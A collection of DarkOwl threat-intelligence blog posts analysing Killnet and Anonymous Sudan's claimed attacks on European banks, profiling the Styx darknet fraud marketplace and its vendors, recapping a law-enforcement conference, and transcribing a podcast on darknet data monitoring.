Author: DarkOwl Content Team

Killnet and Anonymous Sudan: Identified Link

June 26, 2023

Using DarkOwl Vision, DarkOwl analysts have been monitoring activity related to the Killnet group and identified threats made in the past week relating to the European financial system. As part of this analysis, DarkOwl analysts have identified a link between Killnet and the group Anonymous Sudan.

The First Telegram Post

A post appeared on Telegram on June 15th from the Russian news site Mash which indicated that the threat actor groups REvil, Killnet and Anonymous Sudan were combining in order to mount an attack against European financial institutions. The Mash article was re-posted on both the Anonymous Sudan Telegram channel and the Killnet channel.

The original posts indicated that attacks against European financial institutions would begin 48 hours after the news article.

No clear indication has been provided of the nature of the attacks, but Killnet has historically been responsible for Distributed Denial of Service (DDoS) attacks, in which a server is flooded with useless network traffic that exploits the limits of the TCP/IP protocols and renders the network inaccessible. Most of the posts have been published on the channels of both Killnet and Anonymous Sudan, indicating that there is some collaboration between the admins of these channels.

A new Telegram channel was set up purporting to be from the group REvil. This channel welcomed Killnet and also posted a poll for followers of the channel to vote on which financial system in Europe they would like to be targeted. Other than an image of cryptocurrency, nothing else has been posted on this channel to date.

Who is REvil?

REvil is a group that conducted ransomware attacks and was assessed to be based in Russia. The group was successful in targeting a number of corporate organizations including Apple, JBS and Colonial Pipeline. In 2021 the group appeared to be disbanded by joint law enforcement actions and its infrastructure was dismantled. It is unclear if the actors reported to be part of this action are previous members of the REvil group or if they are using the name due to its notoriety.

While there has been some reposting of REvil posts on the Killnet and Anonymous Sudan channels, the REvil channel has not reposted anything from the other groups. Furthermore, in later posts by Killnet and Anonymous Sudan, REvil is not mentioned, which may indicate that it is less involved in the activity.

Anonymous Sudan and Killnet Acting Together

On June 16th, both Anonymous Sudan and Killnet posted a message suggesting that there were issues with the IBAN banking system. No reporting was identified that indicated that this was the case. The below screenshot is from DarkOwl Vision.

On June 19th, Anonymous Sudan made a post, provided in both Arabic and English, which indicated that an attack was imminent. It stated that the reported timeframe had been set by the media, and that the group had only said its attacks would begin within that timeframe, not that the results would be evident by then.

On June 19th, Killnet claimed that they had attacked the European Investment Bank. They provided a post indicating that the attack against the European banking system had begun and included a screenshot from Wikipedia giving details of the European Investment Bank. The message was signed by both Killnet and Anonymous Sudan.

The channel then provided posts which appeared to show that there was an error on a European Investment Bank page.

They then reposted another article from the Mash Telegram channel which indicated the European Investment Bank was being targeted by Russian cyber criminals. This included images from The Telegraph, a UK newspaper, and a tweet by the European Investment Bank indicating that it was the victim of a cyberattack. Open-source reporting indicates that the cyberattack was affecting the availability of some of the bank’s websites.

The attack on the European Investment Bank appears to have only affected its websites and is likely a DDoS attack. This is activity both Killnet and Anonymous Sudan have conducted in the past, and it is unclear if they have other capabilities that they will utilize. It is possible that the groups were utilizing the name of REvil to suggest they had further capabilities, given that group’s previous reputation, but there is no data to support this at this time.

In a post on June 21, Killnet claimed that the International Finance Corporation (IFC) had been taken down.

[TRANSLATED IMAGE]
Goodbye 🤚
Unfortunately, the IFC is no longer working, we ask all partners and staff of the Bank’s organization to go #uy 🖕
The International Finance Corporation (IFC; English International Finance Corporation, English IFC) is an international financial institution that is part of the World Bank. The headquarters of the organization is located in Washington (USA, 2121 Pennsylvania Ave NW, DC 20433).

No evidence was provided to confirm this attack and no reporting has been identified to indicate that the IFC has been successfully targeted.

Other posts on the Telegram channels are targeting other organizations, reposts from other sources or requests for donations to be made.

Conclusion

While these groups have claimed that they will bring down the European financial system, there is little evidence to suggest that they are following through with the threat. Furthermore, the capabilities that these groups have historically utilized suggest that any attacks which take place are likely to be DDoS attacks. DarkOwl will continue to monitor for any further activity.



Darknet Marketplace Snapshot Series: Styx Market

June 21, 2023

In DarkOwl’s Darknet Marketplace Snapshot blog series, our researchers provide short-form insight into a variety of darknet marketplaces: looking for trends, exploring new marketplaces, examining admin and vendor activities, and offering a host of insights into this transient and often criminal corner of the internet. This edition features Styx market.



What is Styx Market?

Styx is a darknet marketplace selling illegal techniques for committing fraud, money laundering, and access to stolen data. Chatter on the darknet around Styx market first appeared in 2020 before the marketplace officially opened in mid-January 2023.

Figure 1: Captcha to Styx Market; Source: Styx Market

Styx market offers stolen data as well as a variety of products for conducting illegal cyber activities. Examples include 2FA/SMS bypass, Business Full Info/Tax, Installs for stealers, Anti-detect browsers, laundry services, FB/Google logs, Cashout Banks/VCC, Credit Cards (CC), Crypto-mixer, Stealer services, Look up BG/SSN/DOB, RDP (remote desktop protocol)/VDS (virtual dedicated server)/VPS (virtual private server), and many more. A table of definitions can be found at the bottom of this blog.

Figure 2: Homepage of Styx Market; Source: Styx Market

Infrastructure of Styx Marketplace

Styx marketplace is divided into five main sections: the main page, trusted sellers, auto ESCROW, news, and a filters section on the left side for searching for specific products.

The main page of the marketplace has posts by users advertising what they sell on the market. Usernames are chosen by the users rather than assigned, and can be personalized. The majority of the site is in English and therefore easy to navigate for English speakers. However, many listings and vendor names are in Russian. This includes vendors on the Trusted Sellers page. Vendors on a trusted sellers page have typically been vetted by the administration running the site, and are therefore considered more “trustworthy”.

DarkOwl analysts assess that many sophisticated darknet actors are Russia-based. Therefore, the fact that some vendors and their listings are Russia-affiliated adds to the legitimacy of the marketplace. There are noticeable spelling errors throughout the site in some of the listings posted by vendors. In some cases, a listing will include both a Russian and an English translation. Some of the filters that can be used to search for specific products or goods offer a Russian translation right next to them.

Many kinds of stolen or leaked data are offered for sale in listings. Listings can be found on the main page and under News, and certain kinds of data can be searched for with the filter bar. Looking at individual listings, the personal data offered for sale is mostly from the West. The kinds of data for sale are typically PII (personally identifiable information) and credentials, information that can be used for fraud and scams. For example, a hacked database of U.S. payday loans is available for $90. There are also Spanish national identification cards available. Many foreign governments issue national identification cards to their citizens, which are used while voting, traveling, and applying for government benefits, and are used by law enforcement for identification purposes. Other personally identifiable information from the EU, such as credentials, is offered in multiple listings. However, multiple APAC (Asia Pacific) and Middle Eastern countries are also represented on the site.

For payment, Styx market has its own ESCROW-enabled payment system. According to the terms and conditions of the marketplace’s auto-ESCROW, the maximum amount of a transaction is $1,000,000 USD. The ESCROW system can also be used by buyers and sellers for dispute resolution. They can invite an Arbitrator by clicking on a support button. The Arbitrator takes 4% of each arbitration, and their decision is final.

The infrastructure of Styx Market relies heavily on a Telegram component.

In some cases, the “contact seller” button on the marketplace will lead directly to a Telegram channel. Vendors who rely on Telegram will typically have multiple channels tied to their vendor shop: one for administrative support and another for selling their products.

Figure 3: Trusted Sellers of Styx Market; Source: Styx Market

Focus on Financial Crime

The majority of services on the marketplace appear to be financial. Customer information for digital banking services such as Chime and PayPal is listed, as well as for more traditional banks including Capital One Bank, Wells Fargo, Citi Bank, and Old National Bank, among others. Access to cryptocurrency exchanges and Bitcoin platforms is prevalent across the site; sites such as Crypto[.]com, Coinbase, BitRue, Kraken, and others are listed by sellers offering access to compromised accounts or facilitating the cashing out of illicit funds. It is unclear from our research which of these purposes the accounts are offered for, but historically we have seen them used for both.

Figure 4: Wells Fargo Account; Source: Styx Market
Figure 5: KYC Binance Tutorial; Source: Styx Market

The products and data available on Styx can be used to help a cybercriminal at every stage of financial fraud. This could start with social engineering emails targeting CEOs, then using lookup services as reconnaissance to collect data on targeted individuals, such as a mother‘s maiden name, the name of a family pet, or past addresses, to help access accounts, and finally creating accounts to drop and launder money. Lookup services are used by cybercriminals and bad actors for reconnaissance. They use lookup service information to help them pass verification and authenticate as their victim when committing fraud.

Figure 6: Telegram Channel for a Lookup Service on Styx Market; Source: Telegram

[TRANSLATED IMAGE]
☀️Search manually: 
DL ($8) 
SSN ($8) 
DOB ($2) 
EIN ($10) 
☀️Search via API: 
DL ($8) 
SSN ($8) 
⚙️Connect to the API and search 24/7 

Styx market also provides cash out and money laundering services. Multiple vendors claim to provide this service, and each has their own requirements. For example, the vendor “Verta” typically charges a 50% commission. They also have requirements for the minimum amount of money needed for a transfer: $15,000 minimum per transfer to a personal account and $75,000 minimum per transfer to a business account.

Figure 7: Verta Requirements; Source: Telegram

Facilitating financial crime appears to be a major component of the services offered on Styx marketplace. Cash out vendors require significant minimums for their services. Cash out services are used to turn illicit Bitcoin into fiat currency. This can be an issue if the service, such as Coinbase, requires users to verify their real identity and to prove that the crypto funds are legal, neither of which a darknet actor would do.

Banks are wary of cryptocurrencies’ links to the darknet and will likely be hesitant to cash out large sums of crypto, or will raise a red flag and require additional documentation. Darknet cash out services help darknet actors cash out their illegal cryptocurrency by using their own methods to circumvent the system. Exact methods are hard to come by, as vendors do not publish how they operate. However, one way includes using multiple Bitcoin wallets, running them through personalized mixers, and finding a Bitcoin buyer who gives cash in exchange. Another way is to send Bitcoin to a company that will charge a prepaid debit card.

Cash out services typically have minimums and high commissions, indicating that their customer base consists of actors with illicit cryptocurrency gains who have enough funds that the cash out is worthwhile despite the high commission. These signals could indicate that Styx market has been designed and built for users who are already experienced in cybercrime, since they appear to have access to a high amount of illicit funds.

Unique Characteristics of Styx Market

DarkOwl analysts have observed that a unique characteristic of Styx market is its interconnectedness with Telegram. For each listing, the user has the option to get in contact with the seller directly to purchase the item. A “Get in Contact” button will either bring the user to a page with a chat box on the marketplace itself, or the user will be taken to a Telegram channel. The Telegram channels are a mix of bots and direct access to the sellers themselves. Some Telegram channels, such as that of the money laundering service “Verta”, are used by the sellers to publish their terms of service and positive reviews of their services. Positive customer reviews are key to gaining trust in the darknet community.

Limited descriptions of products are given on the site, and users are often redirected to a specific Telegram channel of that vendor. The Telegram channels are either a channel for direct messages to the seller or the seller’s support channel.

A Telegram channel is used to broadcast information to a wide audience; only admins are able to post and there can be an unlimited number of subscribers. A public group is similar to a channel, but all subscribers can post in the chat. Public channels have a username, and anyone can join. Private channels are only accessible if a user is added by the owner or receives a private link to join. Analysts have observed that it is common for darknet vendors to have multiple Telegram accounts, where each is used for a different purpose. One may be just for support, one could be for posting new products, and yet another might be for direct messages to the admin.

Figure 8: Link to Deviant Shop’s Telegram from Styx Market; Source: Styx Market

In the Telegram channels, descriptions of products and availability are shared. Buyers can also get pictures of the kind of products they are looking to buy as proof.

Figure 9: Deviant Shop Telegram Channel; Source: Telegram

A Look at the Vendors of Styx Market

To understand if a darknet marketplace is sophisticated, it is important to assess the legitimacy and level of sophistication of its vendors. Trustworthy darknet marketplaces are more likely to have vendors with a considerable darknet footprint. More legitimacy is afforded to a vendor if they have been selling for multiple years, across different marketplaces, and have been evaluated to be trustworthy and not a scammer. Using DarkOwl Vision, the darknet, and darknet-adjacent sites, DarkOwl analysts looked at vendors from Styx market to review their footprints across the darknet. The presence of the vendors on the darknet will likely indicate whether vendors on Styx market are sophisticated hackers or skids (script kiddies).

The vendor shop “Valera888” sells PII, such as national identification documents, on Styx market. Using DarkOwl Vision, this same vendor’s username was found on darknet carding sites, a popular Russian darknet hacking forum, and other darknet marketplaces dating back to 2019. Although the same username used on Styx has appeared across darknet marketplaces in the past, there is no way to tell if the same person is behind those accounts. In the past the username has been associated with selling CVVs and private software. The accounts could belong to the same user, since they seem to follow a pattern of selling personal information, but this is unconfirmed.

Figure 10: Mapping Valera888 with information from DarkOwl Vision

“337 Diller” is a vendor on the trusted vendors page of Styx marketplace. This vendor offers lookup services.

Figure 11: Vendor Profile of 337 Diller on Styx Market; Source: Styx Market

There are two Telegram channels directly associated with this vendor on Styx marketplace. Further research reveals other channels run by a vendor with the same name selling similar products on Telegram. One of the Styx-associated channels advertises data for sale and recruitment posts. Purchases of the data posted on this channel can be made through the linked Telegram bot channel. A support channel is also linked within this channel. The other channel consists of reviews of the vendor.

Figure 12: 337 Diller selling services on Telegram; Source: DarkOwl Vision

Research from DarkOwl Vision indicates this vendor has been offering lookup services and fullz since at least 2021, both via Telegram and on popular darknet marketplaces and forums.

Figure 13: Mapping 337 Diller using data from DarkOwl Vision

“Podorozhnik” sells drawing services as a vendor on Styx market, where a user can get in touch with them via the chat feature offered on the site. Drawing services is a term used for forged and fake documents. In addition to their presence on Styx, they also offer their fake documents for sale via dedicated Telegram channels. “Podorozhnik” advertised their drawing services on the darknet site DarkMoney in 2021. No Telegram channels are linked directly on Styx market, but there are multiple public channels connected to “Podorozhnik” on Telegram. For example, they have a Telegram channel dedicated to reviews. These show communication between customers and “Podorozhnik” about successful verifications. A Telegram channel advertising “Podorozhnik” claims they had over 900 positive reviews on a popular Russian forum.

Figure 14: Mapping Podorozhnik using data from DarkOwl Vision

As each of the three vendors researched appears to have been present on darknet forums and marketplaces for years before joining Styx, they are more likely to be sophisticated and legitimate vendors. Vendor reviews are an essential component of establishing trust on darknet marketplaces and reassuring potential buyers of the legitimacy of the vendor. Two of the three vendors have reviews readily available for potential buyers to evaluate, including Telegram channels dedicated to reviews. These reviews point to trust in the vendor. The vendors have also embraced Telegram for selling products and services and as a support system for customers. Telegram continues to grow as a main avenue for buying and selling darknet-related goods. Some of the Telegram channels associated with Styx marketplace vendors were created as early as 2021, while others have been created within the last year.

Final Thoughts

The products sold on Styx marketplace are hacker and financial-crime oriented. The market caters to sophisticated cybercriminals. Vendors offer access to multiple online banking and e-commerce sites. Money laundering services are strict and only for those who can meet the dollar minimum. While money laundering is risky, and therefore requires a minimum payment, vendors have been successful enough to continue offering the service, and despite the high price there appear to be customers who are willing to pay. Financial institutions and the banking sector will need to remain wary given the account identity authentication techniques available for sale on Styx market. These include NFC BINs (NFC is what allows contactless payment on cards) and vendors offering to set up funnel accounts, which can be used as a drop service to “drop” stolen funds. Much like cash out vendors, drop services are used for laundering illegally earned funds. For now, Styx market will provide a valuable outlet for cybercrime on the darknet as cybercriminals go after the online components of banking and come up with new methods of money laundering.



Table of Definitions

Word: Definition

2FA/SMS Bypass: 2FA is two-factor authentication and is used to help secure accounts. SMS text messages are a common way to deliver 2FA, often as one-time codes. Cybercriminals can achieve SMS bypass by SIM swapping or intercepting networks.

Business Full Info/Tax: Business full info consists of detailed PII that could be used by a cybercriminal to commit fraud or identity theft. Coupled with tax information, the bad actor could commit many forms of financial fraud, such as fraudulent wire transfers.

Installs for stealers: Some stealers are sold as pay-per-install services. A user can pay to download the malware and install it on compromised systems of their choice.

Anti-detect browsers: Anti-detect browsers can be used for privacy and anonymity online, as they avoid detection by online web-tracking technologies.

Laundry Services: Laundry services are money laundering services used to “clean” cash received from illegal activities and get the cash into the legal banking system.

FB/Google Logs: Logs are records of activity that take place on computer systems. Using a record of activity such as Facebook posts and Google searches, a bad actor could use this information for phishing texts, emails, and sophisticated social engineering campaigns.

Cashout Banks/VCC: VCC stands for virtual credit cards. Cashing out bank accounts and cashing out virtual credit cards can be used to steal funds or for money laundering.

Crypto-mixer: Crypto-mixers are used for obfuscation. They mix the cryptocurrencies of many users together to obfuscate where money comes from and who it belongs to. The money is later withdrawn to new addresses belonging to each user.

Stealer Services: Stealer services are the stealer-as-a-service market. Actors offer their stealer malware for sale for a customer to essentially rent, so that the customer can compromise and access a device on their own. This way a customer with very little technical know-how can have access to sophisticated stealer malware. These are aimed at less-sophisticated users.

BG/SSN/DOB: Background check, Social Security number, and Date of Birth. This information can be used for identity theft, fraud, and social engineering.

RDP: RDP, Remote Desktop Protocol, is a Microsoft protocol that allows users to connect to another computer or server over the internet. Bad actors will sometimes use exposed RDP ports to install their ransomware on the victim’s system.

VDS: VDS stands for Virtual Dedicated Server and is essentially the leasing of a dedicated server that the user controls completely because it is not shared with other customers. A VDS is the combination of a server, its hardware, and the operating system, run through a remote access component that allows the user to access their server over the internet.

VPS: VPS is a Virtual Private Server, and they are used for web hosting. Nation-state actors are known to use these in attacks as a proxy or bridge between the real server and the target, as well as for hosting RDPs, VPNs, and proxy gateways to hide the location of command and control servers. They are used to hide the attacker’s location from security systems on targeted devices and to obfuscate the true IP addresses and locations.

DarkOwl Strengthens European Presence at ISS World Europe

June 16, 2023

Last week, DarkOwl participated in ISS World Europe in Prague. ISS World Europe prides itself on being “the world’s largest gathering of Regional Law Enforcement, Intelligence and Homeland Security Analysts, Telecoms as well as Financial Crime Investigators responsible for Cyber Crime Investigation, Electronic Surveillance and Intelligence Gathering.” ISS World events (DarkOwl will be at a couple more this year) focus on the latest in cyber tools and methodologies specifically for law enforcement, public safety, government and private sector intelligence communities. The first full day of ISS events is dedicated to training and in-depth sessions. Trainings and topics covered throughout the event include how to use cyber capabilities to combat drug trafficking, cyber money laundering, human trafficking, terrorism and other nefarious activity that occurs across the internet.

Representing DarkOwl this year at ISS World Europe was one of DarkOwl’s dynamic duos: David Alley, CEO of DarkOwl FZE, based in Dubai, and Ramesh Elaiyavalli, CTO of DarkOwl, based out of DarkOwl’s headquarters in Denver, CO.

The networking opportunities this year were unmatched. David expressed, “This was the best ISS Prague I have ever attended. The show continues to grow in importance.” Needless to say, the team looks forward to next year. In addition to networking with new prospects, David and Ramesh were able to meet with a number of current partners and customers, an opportunity which is invaluable to have roadmap conversations, gather feedback and catch up face-to-face. Throughout the event, top minds of the space share the latest technology, trends and thought leadership in the cyber community. Topics this year included the growth of Telegram, cryptocurrency de-anonymization, blockchains’ growing role in geopolitical conflict, policing Tor, info-stealer ecosystems, visual intelligence from IoT, AI, mobile tracking, and more.

Ramesh noted a common theme throughout attendees, conversations and presentations: “everyone is suffering from data fatigue – too much data and too little insights.” This emphasizes the importance of law enforcement’s need to invest in software and data solutions that deliver insights and make data easily digestible. DarkOwl plays an important role in providing valuable data and threat intelligence to this market.

Due to the layer of anonymity it provides, the darknet is often a hub for illegal activity. However, investigating crime on the darknet and deep web poses technical challenges, including the fact that darknet sites are continually coming online and going offline, with pages vanishing from one minute to the next. The technology DarkOwl leverages to scrape and index hidden digital undergrounds is key to the mission of obtaining proactive situational awareness for the protection of the nation’s security initiatives. DarkOwl Vision UI provides a user-friendly interface with powerful querying capabilities to search, monitor, and create alerts for critical information. DarkOwl Vision has been used to support local and federal police investigations, as well as work done in intelligence/fusion centers and federal agencies, to uncover human trafficking, opioid selling, terrorism, security issues, and other illegal activity, making it a fitting tool for this audience.

Live Demonstration of DarkOwl Vision: Darknet Intelligence Discovery and Collection

The first day of the event, before booths were open, David Alley was able to give a live presentation to attendees demonstrating DarkOwl Vision: Darknet Intelligence Discovery and Collection. The team is thrilled to share that the conference room was filled to the brim with standing room only. The goal of this session was to further educate the international intelligence community on how threat actors on the darknet are evolving in their use of new tools and methodologies.

Vision UI is the industry-leading platform for analysts to simply, safely, and comprehensively search the largest commercially available source of darknet data. Vision provides a user-friendly interface with powerful querying capabilities to search, monitor, and create alerts for critical information. You can read more about Vision UI here.


DarkOwl looks forward to continuing our global presence at ISS events; you can see where we will be next and request time to meet with us here.

Forecasting Cyber Threats

June 13, 2023

The darknet contains data critical to understanding criminal behavior and security risk, and companies need an understanding of their exposure on the darknet to determine risk and take mitigating actions.

This report outlines DarkOwl’s new metric based on email and credential volume to measure an organization’s exposure. We tested our metric against 237 public cyberattacks occurring in 2021 and 2022 and found our signal was elevated within the last four months prior to an attack for 74% of the organizations.


To learn more about how DarkSonar can inform threat modeling, third party risk management, cyber insurance, and potentially predict cyber threats, contact us.

Data and the Dark Web: What is it, where is it, and why should we care?

June 07, 2023

Alison Connolly Halland, DarkOwl’s CBO, and Andrew Bayers, Head of Threat Intel at Resilience, discuss the ways data is collected on the darknet and the tools protecting business information, on Building Cyber Resilience Podcast brought to you by Resilience.

What you’ll learn:

  • The ways tools like DarkOwl use threat intelligence to improve resilience.
  • The importance of having layers in your security strategy.
  • Action steps for using darknet information for good.

For those that would rather read the conversation, we have transcribed it below.

NOTE: Some content has been edited for length and clarity.


Alison: We searched for the organization’s email addresses that had been exposed. Those came up. There were plain text passwords associated with them for someone that was actually on the, on the call, which happens all the time. But the part that was embarrassing is their plain text password was not something you would want. My guess was they made it as a 17 year old teenage boy and hadn’t changed it yet.


Ann: Welcome to the Building Cyber Resilience Podcast by Resilience. I’m Dr. Ann Irvine, Chief Data Scientist and Vice President of Product Management.

Richard: And I’m Richard Seiersen, Chief Risk Officer.

Ann: That was DarkOwl’s Chief Business Officer, Alison Connolly Halland, at the top of the show sharing why it may be time to update your password if you haven’t changed it since high school. It’s because of her company’s innovations that her joke is just that and not a breach that destroyed a business.

Alison: We are essentially darknet experts. So what we do 24/7 is we pull content off of the darknet, we park it in our own database, and then we provide our clients who are companies, not individuals, access to that data. Where our expertise lies is in the act of the collection – collecting data off of the darknet is not an easy task. And then number two, in filtering it, sorting it, layering on all of the bells and whistles on top of it so that you could go into our database and type in your social security number, up is gonna hopefully pop nothing, but if it does, it would show you those pages on the darknet that we, DarkOwl, have discovered that has that number present.

Ann: Alison originally started out in finance but was intrigued by some of her consulting clients in the security space. She eventually took the leap and joined the DarkOwl team in Denver, Colorado.

Alison: I’ve been here 6 years and we’ve been through a bunch of iterations and it’s been a really fun company to grow with. There’s just so much happening in the cybersecurity landscape that it’s great. I love it.

Richard: Alison’s work on the front lines helping security professionals use data from the darknet to inform their day-to-day operations is a very specific niche asset to the cybersecurity industry. But it’s important to define exactly why your work is so critical.

Andrew: Why would the CISO at a company care about what happens on the dark web? They have a website on the surface web, they don’t operate on the dark web. But seeing what’s happening today and where the conversations are going, that can help in the prioritization of how you address vulnerabilities. So threat intelligence, I like to say, puts a lot of the why behind a lot of the security controls we and our partners recommend to companies.

Richard: That’s Andrew Bayers, Head of Threat Intel at Resilience. Before this role, however, he wore several hats.

Andrew: I started in film school in New York City working at HBO on Sopranos and Sex and the City. And 9-11 happened and I rushed to a Marine Corps recruiting station and shipped off to Parris Island where I went through bootcamp and the Marine Corps sent me to the Defense Language Institute where I learned Korean and Chinese Mandarin. And then I worked on behalf of the Department of Defense and Marine Corps at the National Security Agency for the majority of my adult life. And that’s how I got into the cybersecurity space. So most of my work prior to rejoining Resilience was as a nation-sponsored, advanced persistent threat actor collecting foreign intelligence against our nation’s and allied nations’ foreign adversaries. So yeah, that’s me.

Richard: Andrew is in the trenches at Resilience, using threat intelligence tools like DarkOwl to not only protect our company but also to achieve our mission – to help our clients stay ahead of the bad guys.

Andrew: You know an organization that wants to protect their posture and their critical business functions, looking at the darkweb for those types of threats is critical.

Ann: In this episode with Alison and Andrew, we explore both sides of the security workflow from learning how the data is collected and organized to why it is necessary for making business decisions both proactively and reactively. What is the darknet and why should we care about it? Why are layers so important to build into your cybersecurity strategy? Do you have to work in a basement and wear a black hoodie in order to access this information?

Richard: Alison and Andrew answer these questions and offer valuable action steps for how this underworld of information can be used for good. And no, in case you are wondering, a basement office and black hoodie are not required unless that’s your style, of course, which is totally cool. Anyways, let’s get into it.

Alison: In some ways, people are overly confident on the darknet because they believe that given the lack of IP addresses and cookies and what not, remaining anonymous is kind of its defining feature, so there is kinda some false sense of security there, that even if people are looking at that content, they can’t trace it back. The other thing I think is really funny, or I don’t know why it is funny because I was an econ major and I should know that all these market rules apply whether it is legal or illegal, is that the quest to be the best in the customer success department in the darknet is very much present. So there’s a lot of credit card forums, my favorite one says “we are here to serve our customers, we are the best! We ship overnight, free shipping, we are extremely reliable…” you know reading the verbiage just makes you laugh, because you think these are criminals, but like any business they are trying to win and maintain customers.

Ann: Same with ransomware gangs, right? They have entire customer success divisions.

Alison: Yup!

Andrew: Bad guys are in the business of business too, right?

Alison: Exactly.

Ann: Mm-hmm.

Richard: The darknet is an encrypted layer of the internet that cannot be found through regular search engines like Google. It is used mostly for illegal activities and is a breeding ground for data leaks. Laughs aside, the darknet is not a space you want to enter without proper preparation, tools and support.

Alison: You know, you run the risk of potentially running into content you don’t want to see, visually, you also run the risk of ending up in maybe a marketplace or a forum and potentially exposing your own identity without knowing it. And I think the other one, the third one, which is the reason we, DarkOwl, is in business is it’s an extremely, extremely inefficient place to navigate. So if you think about the surface web, you go onto Google type in your search term, and there are all the results and we all trust that Google has gotten that right. That’s why they are who they are. The darknet is not structured in that way. So if you were to go onto Tor, which you can, that is not an illegal act in itself. It’s just very hard to navigate. There’s not nice clean URLs to find, there’s no pretty search engines or search bars, so you’re gonna burn a lot of time frankly.

Ann: While the anonymous factor that Alison highlighted earlier is certainly part of the draw to the darknet, it’s not entirely true. Leaders like DarkOwl are making the data more searchable to help companies identify specific actors on the darknet through graphing.

Alison: So I mean, part of it is us, as we collect all of this data and we’re indiscriminate in how we do that. And what I mean by that is we don’t look at, look at a page on the darknet and say, oh, this is outside of our industry – we’re not gonna grab it. We always grab it. And then once we do, the first thing we do is just tokenize everything that we see. Do we see social security number? Do we see an email address? Do we see a domain? Do we see an IP address? And obviously there’s tons of free text in between there, but we’re gonna tokenize as many items as we can, right? Is there an ampersand, like a threat actor name? And then once you’ve done that, like you said, it becomes really interesting when you can graphically represent the information, right? If you are a seller on a marketplace and we can connect you to a different seller that has a similar name that was, you start to play that game, which becomes really powerful in the investigation space. We are extremely strong on the identification of entities within the data. The graphing piece we are adamantly working on and have made some huge strides, but we haven’t, we definitely, if I’m being honest, we haven’t perfected that piece yet. And some of our clients actually use their own graphing abilities on top of our data.

Richard: So very interesting business model. And I’m just curious, maybe you can tell me about the type of clients you have and the threat intelligence groups and folks like that, that are in these organizations. I just have to assume their use cases are varied, but I’d like to hear more about that.

Alison: I like to bucket our clients into three groups. There’s one that people don’t often think of, that is where the majority of our clients sit. So number one, we do serve government and law enforcement. If you work for the DEA and you are in charge of tracking down folks selling fentanyl, you would wanna have access to the darknet where they’re actually doing that. And the DEA is not a client for the record, but that is one bucket of our clients – although the smallest.

Number 2 is large enough corporations where the risk of having their own organization exposed on the darknet is worth looking at this data set. So think Fortune 1000, you’re the CISO of Nike, and you wanna know, is someone targeting my executives? Is someone going after my IP address? Is someone talking about a ransomware attack or are my newest designs of my Nike shoes being sold. Counterfeiting is a big use case for us. So clients that have products that are being sold in counterfeit markets. So those are companies that are purchasing DarkOwl data and they’re looking at it for their own edification. That’s bucket number two.

And then interestingly, the biggest bucket of our clients are clients that are purchasing DarkOwl data, aggregating it and looking at it on behalf of their clients. So most of those folks sit in the cybersecurity industry. So it’s other cybersecurity companies that are, and we are essentially that darknet component. So I sort of like to think of it – you buy a Dell computer and it, you know, they used on the ad, they’d be like, powered by Intel and then it would make that little noise. So, it’s DarkOwl or their darknet is powered by DarkOwl. So, and that runs the gamut. They could be layering it on top of social media data. They could be just doing penetration testing and they’re using our data. They could be like you all in the cyber insurance space and they’re looking at DarkOwl across tons of potential companies. So that’s where the majority of our data and our clients reside is those that are looking at added on behalf of their clients.

Ann: At Resilience, this is how we utilize DarkOwl. Andrew Bayers, Head of Threat Intel, is quick to point out that what he is looking for in his role falls right in between the bad activity happening on the darknet and the good activity.

Andrew: You hear about the dark web and the news and really all the conversations you hear about it are about most of the bad things that are happening, right? So, you know, the illicit financing, the money laundering, the drug, narcotics sales, the gang activity, the criminal underbelly, sort of like place of communication. But there are actually a lot of good things going on where people in more oppressed nations who have, you know, a difficult time getting information out of their countries and sharing that with the world, that’s a great place to do that. There are journalists there, whistleblowers, there are people doing good on the dark web. So there’s good stuff too, if that’s what you meant by good. Now there’s a lot of juicy stuff that we care about, but none of it is good. None of that is good, right?

Richard: So the juicy stuff goes under the general rubric of threat intelligence. I always like asking people what is threat intelligence and how would I know it’s happening to me?

I always like asking people that question because the answer points to why we do what we do at Resilience. Andrew highlights exactly how this plays out in his day-to-day workflow.

Andrew: You know, it’s like know your enemy, right? So knowing the people behind the keyboards that are attacking you, or have the potential to attack you, what their behaviors are. Like, what are the types of malware that people are purchasing? What are the trending vulnerabilities that are being discussed? So we had pretty strict criteria about the things that we want to engage directly with our customers about, and it has to meet three pieces of criteria. One, the vulnerability, so we are consistently evaluating the posture of our book of business. And so, and that’s company by company. And with the help of a lot of great people in engineering and data science, we are able to do this on a regular basis that a lot of it is automated. And so for us, when we see a company that, let’s say we, we see a vulnerability that is associated with some asset that they have exposed to the internet.

So first, is it remotely accessible. Like is it exposed to the internet or is this some local vulnerability that there would be a sort of a higher bar of entry in order to get to that asset. So those aren’t those types of things we wouldn’t really see from what we do. So it has to be remotely accessible. So remotely exploitable, right? It has to be our customers. So, you know, not a CVSS score, right, of critical. It doesn’t necessarily have to be a critical vulnerability, but if it becomes a critical vulnerability to us, if we know attackers are exploiting it actively in the wild or a proof of concept has been released on how to exploit that vulnerability. The third piece is there is actionable mitigation or remediation measures that have either been released by the vendor or a security researcher or somebody. So there is a specific action that the customer can take to mitigate or remediate. And then when we identify those, so it meets those criteria, we engage directly with the customer to notify them and help them through the process of remediation.

Richard: One follow-on to that. So one vector of course is the remote. But many bad guys these days, particularly ransomware, they’re attacking what we call layer 8, the human, right? So be it spear phishing or phishing in general, or you think about business email compromise, all these other vectors. What’s the bridge between that threat intelligence and how you work with your customers?

Andrew: Sure, the dark web is a great place to hunt for potential insider threats. And that doesn’t necessarily mean it has to be a malicious insider. Maybe it’s a negligent or unintentional error on the part of an insider that led to something like their credentials being exposed. Maybe it’s something through their own personal life that was exposed and then somehow that is, you know, associated to it enabling some sort of access to that organization. So another piece on the malicious sort of insider that the dark web is the place where people sell access to threat actors. So it is also the place where threat actors advertise paying for access to specific things like, “hey, do you work for this type of company? If so, and you have access, we would like to buy that from you.”

Ann: Wow, that’s terrifying to think about people sort of selling their access as an employee of an organization. A comparable thing happens, of course, and working with any nation state for espionage. But how often is that really happening? Is that happening frequently?

Andrew: Every day. And it’s on the rise, I would say like more in 2022 than in 2021. And I mean, the expectation is more in 2023. So our CISO loves to make this joking comment and I find it funny, but it is scary. Like you said, it’s terrifying, right? We’re all just one bad day away from being that threat actor selling access.

Ann: Yeah. In a way, I kind of hate talking about this in a public venue like this podcast, you know, I don’t wanna advertise that this is a thing… hey, go to the dark web and you can make a quick buck with your corporate credentials. But sounds like that could be the case.

